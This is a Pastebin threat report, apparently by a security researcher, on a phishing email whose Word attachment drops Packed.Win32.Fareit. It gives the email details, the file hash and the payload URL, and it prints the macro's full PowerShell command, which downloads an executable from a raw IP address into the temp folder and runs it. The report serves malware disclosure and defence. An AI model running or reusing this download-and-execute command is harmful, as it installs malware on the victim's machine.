Advertisement
Neonprimetime

Packed.Win32.Fareit VBA Macro

Mar 16th, 2015
503
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.78 KB | None | 0 0
  1. Packed.Win32.Fareit VBA Macro
  2. Reported by neonprimetime security
  3. http://neonprimetime.blogspot.com
  4.  
  5. *****
  6. Blog about this: http://neonprimetime.blogspot.com/2015/03/talking-thru-some-malware-in-microsoft.html
  7. *****
  8.  
  9. Malicious Email
  10. From: Forrest Chavez <Carmella.7b@lepau.com>
  11. Subject: Outstanding invoices - 122680 January
  12. Attachment: 122680.doc , MD5 Checksum cbfb453c2c43951ecbefc4eb6c20fb7f
  13. *****
  14.  
  15. Payload
  16. hxxp://62.76.41.15/asalt/assa.exe
  17. Packed.Win32.Fareit.1!O
  18. ******
  19.  
  20. Microsoft Word VBA Macro
  21.  
  22. "cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://62.76.41.15/asalt/assa.exe','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement